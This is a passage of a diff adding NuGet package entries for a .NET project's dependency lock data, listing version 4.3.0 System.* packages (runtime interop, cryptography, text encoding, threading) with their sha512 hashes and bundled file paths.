"lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/_._", + "ref/netstandard1.3/System.Runtime.Handles.dll", + "ref/netstandard1.3/System.Runtime.Handles.xml", + "ref/netstandard1.3/de/System.Runtime.Handles.xml", + "ref/netstandard1.3/es/System.Runtime.Handles.xml", + "ref/netstandard1.3/fr/System.Runtime.Handles.xml", + "ref/netstandard1.3/it/System.Runtime.Handles.xml", + "ref/netstandard1.3/ja/System.Runtime.Handles.xml", + "ref/netstandard1.3/ko/System.Runtime.Handles.xml", + "ref/netstandard1.3/ru/System.Runtime.Handles.xml", + "ref/netstandard1.3/zh-hans/System.Runtime.Handles.xml", + "ref/netstandard1.3/zh-hant/System.Runtime.Handles.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.runtime.handles.4.3.0.nupkg.sha512", + "system.runtime.handles.nuspec" + ] + }, + "System.Runtime.InteropServices/4.3.0": { + "sha512": "uv1ynXqiMK8mp1GM3jDqPCFN66eJ5w5XNomaK2XD+TuCroNTLFGeZ+WCmBMcBDyTFKou3P6cR6J/QsaqDp7fGQ==", + "type": "package", + "path": "system.runtime.interopservices/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net462/System.Runtime.InteropServices.dll", + "lib/net463/System.Runtime.InteropServices.dll", + "lib/portable-net45+win8+wpa81/_._", + "lib/win8/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net462/System.Runtime.InteropServices.dll", + "ref/net463/System.Runtime.InteropServices.dll", + "ref/netcore50/System.Runtime.InteropServices.dll", + "ref/netcore50/System.Runtime.InteropServices.xml", + "ref/netcore50/de/System.Runtime.InteropServices.xml", + "ref/netcore50/es/System.Runtime.InteropServices.xml", + "ref/netcore50/fr/System.Runtime.InteropServices.xml", + "ref/netcore50/it/System.Runtime.InteropServices.xml", + "ref/netcore50/ja/System.Runtime.InteropServices.xml", + "ref/netcore50/ko/System.Runtime.InteropServices.xml", + "ref/netcore50/ru/System.Runtime.InteropServices.xml", + "ref/netcore50/zh-hans/System.Runtime.InteropServices.xml", + "ref/netcore50/zh-hant/System.Runtime.InteropServices.xml", + "ref/netcoreapp1.1/System.Runtime.InteropServices.dll", + "ref/netstandard1.1/System.Runtime.InteropServices.dll", + "ref/netstandard1.1/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/de/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/es/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/fr/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/it/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/ja/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/ko/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/ru/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/zh-hans/System.Runtime.InteropServices.xml", + "ref/netstandard1.1/zh-hant/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/System.Runtime.InteropServices.dll", + "ref/netstandard1.2/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/de/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/es/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/fr/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/it/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/ja/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/ko/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/ru/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/zh-hans/System.Runtime.InteropServices.xml", + "ref/netstandard1.2/zh-hant/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/System.Runtime.InteropServices.dll", + "ref/netstandard1.3/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/de/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/es/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/fr/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/it/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/ja/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/ko/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/ru/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/zh-hans/System.Runtime.InteropServices.xml", + "ref/netstandard1.3/zh-hant/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/System.Runtime.InteropServices.dll", + "ref/netstandard1.5/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/de/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/es/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/fr/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/it/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/ja/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/ko/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/ru/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/zh-hans/System.Runtime.InteropServices.xml", + "ref/netstandard1.5/zh-hant/System.Runtime.InteropServices.xml", + "ref/portable-net45+win8+wpa81/_._", + "ref/win8/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.runtime.interopservices.4.3.0.nupkg.sha512", + "system.runtime.interopservices.nuspec" + ] + }, + "System.Runtime.InteropServices.RuntimeInformation/4.3.0": { + "sha512": "cbz4YJMqRDR7oLeMRbdYv7mYzc++17lNhScCX0goO2XpGWdvAt60CGN+FHdePUEHCe/Jy9jUlvNAiNdM+7jsOw==", + "type": "package", + "path": "system.runtime.interopservices.runtimeinformation/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll", + "lib/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll", + "lib/win8/System.Runtime.InteropServices.RuntimeInformation.dll", + "lib/wpa81/System.Runtime.InteropServices.RuntimeInformation.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/aot/lib/netcore50/System.Runtime.InteropServices.RuntimeInformation.dll", + "runtimes/unix/lib/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll", + "runtimes/win/lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll", + "runtimes/win/lib/netcore50/System.Runtime.InteropServices.RuntimeInformation.dll", + "runtimes/win/lib/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll", + "system.runtime.interopservices.runtimeinformation.4.3.0.nupkg.sha512", + "system.runtime.interopservices.runtimeinformation.nuspec" + ] + }, + "System.Runtime.Numerics/4.3.0": { + "sha512": "yMH+MfdzHjy17l2KESnPiF2dwq7T+xLnSJar7slyimAkUh/gTrS9/UQOtv7xarskJ2/XDSNvfLGOBQPjL7PaHQ==", + "type": "package", + "path": "system.runtime.numerics/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/netcore50/System.Runtime.Numerics.dll", + "lib/netstandard1.3/System.Runtime.Numerics.dll", + "lib/portable-net45+win8+wpa81/_._", + "lib/win8/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Runtime.Numerics.dll", + "ref/netcore50/System.Runtime.Numerics.xml", + "ref/netcore50/de/System.Runtime.Numerics.xml", + "ref/netcore50/es/System.Runtime.Numerics.xml", + "ref/netcore50/fr/System.Runtime.Numerics.xml", + "ref/netcore50/it/System.Runtime.Numerics.xml", + "ref/netcore50/ja/System.Runtime.Numerics.xml", + "ref/netcore50/ko/System.Runtime.Numerics.xml", + "ref/netcore50/ru/System.Runtime.Numerics.xml", + "ref/netcore50/zh-hans/System.Runtime.Numerics.xml", + "ref/netcore50/zh-hant/System.Runtime.Numerics.xml", + "ref/netstandard1.1/System.Runtime.Numerics.dll", + "ref/netstandard1.1/System.Runtime.Numerics.xml", + "ref/netstandard1.1/de/System.Runtime.Numerics.xml", + "ref/netstandard1.1/es/System.Runtime.Numerics.xml", + "ref/netstandard1.1/fr/System.Runtime.Numerics.xml", + "ref/netstandard1.1/it/System.Runtime.Numerics.xml", + "ref/netstandard1.1/ja/System.Runtime.Numerics.xml", + "ref/netstandard1.1/ko/System.Runtime.Numerics.xml", + "ref/netstandard1.1/ru/System.Runtime.Numerics.xml", + "ref/netstandard1.1/zh-hans/System.Runtime.Numerics.xml", + "ref/netstandard1.1/zh-hant/System.Runtime.Numerics.xml", + "ref/portable-net45+win8+wpa81/_._", + "ref/win8/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.runtime.numerics.4.3.0.nupkg.sha512", + "system.runtime.numerics.nuspec" + ] + }, + "System.Security.Cryptography.Algorithms/4.3.0": { + "sha512": "W1kd2Y8mYSCgc3ULTAZ0hOP2dSdG5YauTb1089T0/kRcN2MpSAW1izOFROrJgxSlMn3ArsgHXagigyi+ibhevg==", + "type": "package", + "path": "system.security.cryptography.algorithms/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Security.Cryptography.Algorithms.dll", + "lib/net461/System.Security.Cryptography.Algorithms.dll", + "lib/net463/System.Security.Cryptography.Algorithms.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Security.Cryptography.Algorithms.dll", + "ref/net461/System.Security.Cryptography.Algorithms.dll", + "ref/net463/System.Security.Cryptography.Algorithms.dll", + "ref/netstandard1.3/System.Security.Cryptography.Algorithms.dll", + "ref/netstandard1.4/System.Security.Cryptography.Algorithms.dll", + "ref/netstandard1.6/System.Security.Cryptography.Algorithms.dll", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/osx/lib/netstandard1.6/System.Security.Cryptography.Algorithms.dll", + "runtimes/unix/lib/netstandard1.6/System.Security.Cryptography.Algorithms.dll", + "runtimes/win/lib/net46/System.Security.Cryptography.Algorithms.dll", + "runtimes/win/lib/net461/System.Security.Cryptography.Algorithms.dll", + "runtimes/win/lib/net463/System.Security.Cryptography.Algorithms.dll", + "runtimes/win/lib/netcore50/System.Security.Cryptography.Algorithms.dll", + "runtimes/win/lib/netstandard1.6/System.Security.Cryptography.Algorithms.dll", + "system.security.cryptography.algorithms.4.3.0.nupkg.sha512", + "system.security.cryptography.algorithms.nuspec" + ] + }, + "System.Security.Cryptography.Encoding/4.3.0": { + "sha512": "1DEWjZZly9ae9C79vFwqaO5kaOlI5q+3/55ohmq/7dpDyDfc8lYe7YVxJUZ5MF/NtbkRjwFRo14yM4OEo9EmDw==", + "type": "package", + "path": "system.security.cryptography.encoding/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Security.Cryptography.Encoding.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Security.Cryptography.Encoding.dll", + "ref/netstandard1.3/System.Security.Cryptography.Encoding.dll", + "ref/netstandard1.3/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/de/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/es/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/fr/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/it/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/ja/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/ko/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/ru/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/zh-hans/System.Security.Cryptography.Encoding.xml", + "ref/netstandard1.3/zh-hant/System.Security.Cryptography.Encoding.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/unix/lib/netstandard1.3/System.Security.Cryptography.Encoding.dll", + "runtimes/win/lib/net46/System.Security.Cryptography.Encoding.dll", + "runtimes/win/lib/netstandard1.3/System.Security.Cryptography.Encoding.dll", + "system.security.cryptography.encoding.4.3.0.nupkg.sha512", + "system.security.cryptography.encoding.nuspec" + ] + }, + "System.Security.Cryptography.Primitives/4.3.0": { + "sha512": "7bDIyVFNL/xKeFHjhobUAQqSpJq9YTOpbEs6mR233Et01STBMXNAc/V+BM6dwYGc95gVh/Zf+iVXWzj3mE8DWg==", + "type": "package", + "path": "system.security.cryptography.primitives/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Security.Cryptography.Primitives.dll", + "lib/netstandard1.3/System.Security.Cryptography.Primitives.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Security.Cryptography.Primitives.dll", + "ref/netstandard1.3/System.Security.Cryptography.Primitives.dll", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.security.cryptography.primitives.4.3.0.nupkg.sha512", + "system.security.cryptography.primitives.nuspec" + ] + }, + "System.Security.Cryptography.X509Certificates/4.3.0": { + "sha512": "t2Tmu6Y2NtJ2um0RtcuhP7ZdNNxXEgUm2JeoA/0NvlMjAhKCnM1NX07TDl3244mVp3QU6LPEhT3HTtH1uF7IYw==", + "type": "package", + "path": "system.security.cryptography.x509certificates/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Security.Cryptography.X509Certificates.dll", + "lib/net461/System.Security.Cryptography.X509Certificates.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Security.Cryptography.X509Certificates.dll", + "ref/net461/System.Security.Cryptography.X509Certificates.dll", + "ref/netstandard1.3/System.Security.Cryptography.X509Certificates.dll", + "ref/netstandard1.3/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/de/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/es/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/fr/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/it/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/ja/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/ko/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/ru/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/zh-hans/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.3/zh-hant/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/System.Security.Cryptography.X509Certificates.dll", + "ref/netstandard1.4/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/de/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/es/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/fr/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/it/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/ja/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/ko/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/ru/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/zh-hans/System.Security.Cryptography.X509Certificates.xml", + "ref/netstandard1.4/zh-hant/System.Security.Cryptography.X509Certificates.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/unix/lib/netstandard1.6/System.Security.Cryptography.X509Certificates.dll", + "runtimes/win/lib/net46/System.Security.Cryptography.X509Certificates.dll", + "runtimes/win/lib/net461/System.Security.Cryptography.X509Certificates.dll", + "runtimes/win/lib/netcore50/System.Security.Cryptography.X509Certificates.dll", + "runtimes/win/lib/netstandard1.6/System.Security.Cryptography.X509Certificates.dll", + "system.security.cryptography.x509certificates.4.3.0.nupkg.sha512", + "system.security.cryptography.x509certificates.nuspec" + ] + }, + "System.Text.Encoding/4.3.0": { + "sha512": "BiIg+KWaSDOITze6jGQynxg64naAPtqGHBwDrLaCtixsa5bKiR8dpPOHA7ge3C0JJQizJE+sfkz1wV+BAKAYZw==", + "type": "package", + "path": "system.text.encoding/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Text.Encoding.dll", + "ref/netcore50/System.Text.Encoding.xml", + "ref/netcore50/de/System.Text.Encoding.xml", + "ref/netcore50/es/System.Text.Encoding.xml", + "ref/netcore50/fr/System.Text.Encoding.xml", + "ref/netcore50/it/System.Text.Encoding.xml", + "ref/netcore50/ja/System.Text.Encoding.xml", + "ref/netcore50/ko/System.Text.Encoding.xml", + "ref/netcore50/ru/System.Text.Encoding.xml", + "ref/netcore50/zh-hans/System.Text.Encoding.xml", + "ref/netcore50/zh-hant/System.Text.Encoding.xml", + "ref/netstandard1.0/System.Text.Encoding.dll", + "ref/netstandard1.0/System.Text.Encoding.xml", + "ref/netstandard1.0/de/System.Text.Encoding.xml", + "ref/netstandard1.0/es/System.Text.Encoding.xml", + "ref/netstandard1.0/fr/System.Text.Encoding.xml", + "ref/netstandard1.0/it/System.Text.Encoding.xml", + "ref/netstandard1.0/ja/System.Text.Encoding.xml", + "ref/netstandard1.0/ko/System.Text.Encoding.xml", + "ref/netstandard1.0/ru/System.Text.Encoding.xml", + "ref/netstandard1.0/zh-hans/System.Text.Encoding.xml", + "ref/netstandard1.0/zh-hant/System.Text.Encoding.xml", + "ref/netstandard1.3/System.Text.Encoding.dll", + "ref/netstandard1.3/System.Text.Encoding.xml", + "ref/netstandard1.3/de/System.Text.Encoding.xml", + "ref/netstandard1.3/es/System.Text.Encoding.xml", + "ref/netstandard1.3/fr/System.Text.Encoding.xml", + "ref/netstandard1.3/it/System.Text.Encoding.xml", + "ref/netstandard1.3/ja/System.Text.Encoding.xml", + "ref/netstandard1.3/ko/System.Text.Encoding.xml", + "ref/netstandard1.3/ru/System.Text.Encoding.xml", + "ref/netstandard1.3/zh-hans/System.Text.Encoding.xml", + "ref/netstandard1.3/zh-hant/System.Text.Encoding.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.text.encoding.4.3.0.nupkg.sha512", + "system.text.encoding.nuspec" + ] + }, + "System.Text.Encoding.Extensions/4.3.0": { + "sha512": "YVMK0Bt/A43RmwizJoZ22ei2nmrhobgeiYwFzC4YAN+nue8RF6djXDMog0UCn+brerQoYVyaS+ghy9P/MUVcmw==", + "type": "package", + "path": "system.text.encoding.extensions/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Text.Encoding.Extensions.dll", + "ref/netcore50/System.Text.Encoding.Extensions.xml", + "ref/netcore50/de/System.Text.Encoding.Extensions.xml", + "ref/netcore50/es/System.Text.Encoding.Extensions.xml", + "ref/netcore50/fr/System.Text.Encoding.Extensions.xml", + "ref/netcore50/it/System.Text.Encoding.Extensions.xml", + "ref/netcore50/ja/System.Text.Encoding.Extensions.xml", + "ref/netcore50/ko/System.Text.Encoding.Extensions.xml", + "ref/netcore50/ru/System.Text.Encoding.Extensions.xml", + "ref/netcore50/zh-hans/System.Text.Encoding.Extensions.xml", + "ref/netcore50/zh-hant/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/System.Text.Encoding.Extensions.dll", + "ref/netstandard1.0/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/de/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/es/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/fr/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/it/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/ja/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/ko/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/ru/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/zh-hans/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.0/zh-hant/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/System.Text.Encoding.Extensions.dll", + "ref/netstandard1.3/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/de/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/es/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/fr/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/it/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/ja/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/ko/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/ru/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/zh-hans/System.Text.Encoding.Extensions.xml", + "ref/netstandard1.3/zh-hant/System.Text.Encoding.Extensions.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.text.encoding.extensions.4.3.0.nupkg.sha512", + "system.text.encoding.extensions.nuspec" + ] + }, + "System.Text.RegularExpressions/4.3.0": { + "sha512": "RpT2DA+L660cBt1FssIE9CAGpLFdFPuheB7pLpKpn6ZXNby7jDERe8Ua/Ne2xGiwLVG2JOqziiaVCGDon5sKFA==", + "type": "package", + "path": "system.text.regularexpressions/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net463/System.Text.RegularExpressions.dll", + "lib/netcore50/System.Text.RegularExpressions.dll", + "lib/netstandard1.6/System.Text.RegularExpressions.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net463/System.Text.RegularExpressions.dll", + "ref/netcore50/System.Text.RegularExpressions.dll", + "ref/netcore50/System.Text.RegularExpressions.xml", + "ref/netcore50/de/System.Text.RegularExpressions.xml", + "ref/netcore50/es/System.Text.RegularExpressions.xml", + "ref/netcore50/fr/System.Text.RegularExpressions.xml", + "ref/netcore50/it/System.Text.RegularExpressions.xml", + "ref/netcore50/ja/System.Text.RegularExpressions.xml", + "ref/netcore50/ko/System.Text.RegularExpressions.xml", + "ref/netcore50/ru/System.Text.RegularExpressions.xml", + "ref/netcore50/zh-hans/System.Text.RegularExpressions.xml", + "ref/netcore50/zh-hant/System.Text.RegularExpressions.xml", + "ref/netcoreapp1.1/System.Text.RegularExpressions.dll", + "ref/netstandard1.0/System.Text.RegularExpressions.dll", + "ref/netstandard1.0/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/de/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/es/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/fr/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/it/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/ja/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/ko/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/ru/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/zh-hans/System.Text.RegularExpressions.xml", + "ref/netstandard1.0/zh-hant/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/System.Text.RegularExpressions.dll", + "ref/netstandard1.3/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/de/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/es/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/fr/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/it/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/ja/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/ko/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/ru/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/zh-hans/System.Text.RegularExpressions.xml", + "ref/netstandard1.3/zh-hant/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/System.Text.RegularExpressions.dll", + "ref/netstandard1.6/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/de/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/es/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/fr/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/it/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/ja/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/ko/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/ru/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/zh-hans/System.Text.RegularExpressions.xml", + "ref/netstandard1.6/zh-hant/System.Text.RegularExpressions.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.text.regularexpressions.4.3.0.nupkg.sha512", + "system.text.regularexpressions.nuspec" + ] + }, + "System.Threading/4.3.0": { + "sha512": "VkUS0kOBcUf3Wwm0TSbrevDDZ6BlM+b/HRiapRFWjM5O0NS0LviG0glKmFK+hhPDd1XFeSdU1GmlLhb2CoVpIw==", + "type": "package", + "path": "system.threading/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/netcore50/System.Threading.dll", + "lib/netstandard1.3/System.Threading.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Threading.dll", + "ref/netcore50/System.Threading.xml", + "ref/netcore50/de/System.Threading.xml", + 